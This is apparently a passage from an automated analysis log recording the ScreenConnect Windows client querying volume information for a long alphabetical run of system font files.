                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
